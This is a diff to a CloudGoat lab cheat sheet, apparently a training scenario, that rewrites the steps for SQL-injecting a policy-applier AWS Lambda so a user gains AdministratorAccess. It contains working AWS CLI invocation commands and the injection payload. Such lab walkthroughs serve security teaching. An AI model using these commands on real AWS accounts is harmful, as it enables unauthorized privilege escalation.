RhinoSecurityLabs/cloudgoat/scenarios/lambda_injection_privesc/cheat_sheet.md

     # contains the source code for the function.
     aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]
     ```
-5. Craft an injection payload to send through the CLI.
-This is the payload field that will be used to invoke the lambda.
+5. Invoke the role applier lambda function, passing the name of the bilbo user and the injection payload.

     ```bash
-    # This payload is being written to a file in preperation for the next step.
-    echo "{ \"policy_names\": [\"AmazonSNSReadOnlyAccess\", \"AdministratorAccess\' --\"], \"user_name\": \"[bilbo_user_name_here]\" }" >> payload.txt
+    aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}' out.txt
     ```
-6. Invoke the role applier lambda function, passing the name of the bilbo user and the base64 encoded injection payload.

-    ```bash
-    # Passing an injection payload through the cli is a bit complicated.
-The single quote needed to perform SQL injection
-    # causes an argument parsing error for the cli, so I base64 encoded it.
-That process adds newline characters, which cause
-    # the same problem, so that is removed after the pipe.
-    aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --payload $(base64 payload.txt | tr -d '\n') output.txt
-    ```
-7. Now that Bilbo is an admin, use credentials for that user to invoke the target lambda.
+6. Now that Bilbo is an admin, use credentials for that user to invoke the target lambda.

     ```bash
     # This command invokes the target lambda